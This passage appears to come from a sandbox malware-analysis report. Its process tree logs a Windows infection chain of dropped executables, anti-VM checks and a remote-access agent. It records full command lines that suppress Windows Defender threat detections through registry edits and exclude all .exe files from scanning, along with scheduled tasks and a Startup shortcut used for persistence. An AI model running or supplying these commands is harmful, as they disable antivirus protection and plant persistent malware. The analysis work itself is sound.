PID:1592

C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
"C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
"C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
4⤵
- Executes dropped EXE
PID:3984

C:\Users\Admin\AppData\Local\Temp\7zSF935.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:888

C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe
.\Install.exe /WCodidzc "385121" /S
6⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
7⤵
PID:4740

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:3084

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
9⤵
- System Location Discovery: System Language Discovery
PID:756

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
10⤵
- System Location Discovery: System Language Discovery
PID:2360

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
PID:1520

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
9⤵
PID:2600

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
10⤵
PID:2808

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2920

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
9⤵
PID:1052

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
10⤵
PID:3756

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
8⤵
- Indirect Command Execution
PID:4308

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
9⤵
- System Location Discovery: System Language Discovery
PID:4804

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
10⤵
PID:4276

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
8⤵
- Indirect Command Execution
PID:924

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
9⤵
PID:2448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2188

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
11⤵
- System Location Discovery: System Language Discovery
PID:2108

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
7⤵
- Indirect Command Execution
PID:3716

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- System Location Discovery: System Language Discovery
PID:3596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3288

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bMRcrYTbxyvtsWXpEp" /SC once /ST 14:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe\" ag /pjwdidTEY 385121 /S" /V1 /F
7⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:660

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
2⤵
- System Location Discovery: System Language Discovery
PID:2920

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
2⤵
- Drops startup file
PID:532

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap4886:70:7zEvent17659 -tzip -sae -- "C:\Users\Admin\AppData\Local\Temp.zip"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff83d18cc40,0x7ff83d18cc4c,0x7ff83d18cc58
3⤵
PID:4700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1836 /prefetch:2
3⤵
PID:1324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2108 /prefetch:3
3⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2320 /prefetch:8
3⤵
PID:2252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:1
3⤵
PID:5116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3284 /prefetch:1
3⤵
PID:876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4532,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4536 /prefetch:1
3⤵
PID:4516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4688,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4840 /prefetch:8
3⤵
PID:1464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4340 /prefetch:8
3⤵
PID:64

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3656,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5088 /prefetch:1
3⤵
PID:1652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4700,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5172 /prefetch:1
3⤵
PID:1132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3256,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3232 /prefetch:1
3⤵
PID:5312

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4616,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4620 /prefetch:1
3⤵
PID:64

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5360,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4440 /prefetch:1
3⤵
PID:5140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5496,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5512 /prefetch:1
3⤵
PID:5476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4628,i,2509014878077264446,127401885868767027,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3156 /prefetch:1
3⤵
PID:6044

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3336 -ip 3336
1⤵
PID:1192

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1584

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4036

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2800

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2320

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
PID:860

C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
2⤵
- System Location Discovery: System Language Discovery
PID:4880

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
PID:3180

C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
2⤵
PID:5500

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
- System Location Discovery: System Language Discovery
PID:5612

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
- System Location Discovery: System Language Discovery
PID:5720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1644

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
PID:6088

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
PID:5280

C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
2⤵
PID:5340

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1212

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
PID:5468

C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
2⤵
PID:5716

C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
2⤵
- System Location Discovery: System Language Discovery
PID:3968

C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSFD4C.tmp\Install.exe ag /pjwdidTEY 385121 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:5116

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:1212

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:5348

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
- System Location Discovery: System Language Discovery
PID:5332

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:5420

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:5440

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
- System Location Discovery: System Language Discovery
PID:1388

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:5540

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:5556

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:5596

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Indirect Command Execution
PID:5580

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- System Location Discovery: System Language Discovery
PID:5500

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:5604

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Indirect Command Execution
PID:5624

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:5636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5684

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:5496

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:5936

C:\Windows\SysWOW64\cmd.exe
